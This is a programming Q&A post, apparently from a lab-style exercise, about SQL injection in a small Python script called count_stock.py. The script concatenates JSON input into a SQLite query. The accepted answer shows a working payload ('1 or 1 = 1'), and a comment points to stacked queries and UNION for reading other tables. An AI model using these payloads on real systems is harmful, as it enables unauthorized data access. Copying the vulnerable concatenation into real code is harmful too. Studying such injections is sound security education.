# simulating an API call by an external end user to an SQL Database

Tags: python, sql-injection

This script uses a JSON input as an argument and should be run from the command line. An example
may be run as:
python count_stock.py '{"productId":1}'
which returns the value
[(9,)]
I need to Write a script that exploits count_stock.py to return further confidential information within the
Database. The new script must not directly communicate with the DB, it must only call count_stock.py

Here is the count_stock.py script

```
import sys, sqlite3, json
company_db_file = 'company_data.db'
conn = sqlite3.connect(company_db_file)
c = conn.cursor()
for arg in sys.argv[1:]:
    input_json = json.loads(arg)
    c.execute("SELECT amount FROM product WHERE id = " + str(input_json['productId']))
    sys.stdout.write(str(c.fetchall())+ "\n")
conn.commit()
conn.close()
```

Answer (score 1, accepted):

The `str` function doesn't appear to put quotation marks around the argument so you can just pass whatever SQL you want in on the command line.  For example...

```
python count_stock.py '{"productId":"1 or 1 = 1"}'
```

This should execute this SQL:

```
SELECT amount FROM product WHERE id = 1 or 1 = 1
```

This query ignores the "ID" filter and returns all rows in the table.

Comment: there are two more tables , how can I access those details , should I use placeholder instead ? @David

Comment: You might be able to pass in "; select * from table" to execute more than one query against the database.  Another option would be to use the `UNION` operator to add another table to the result.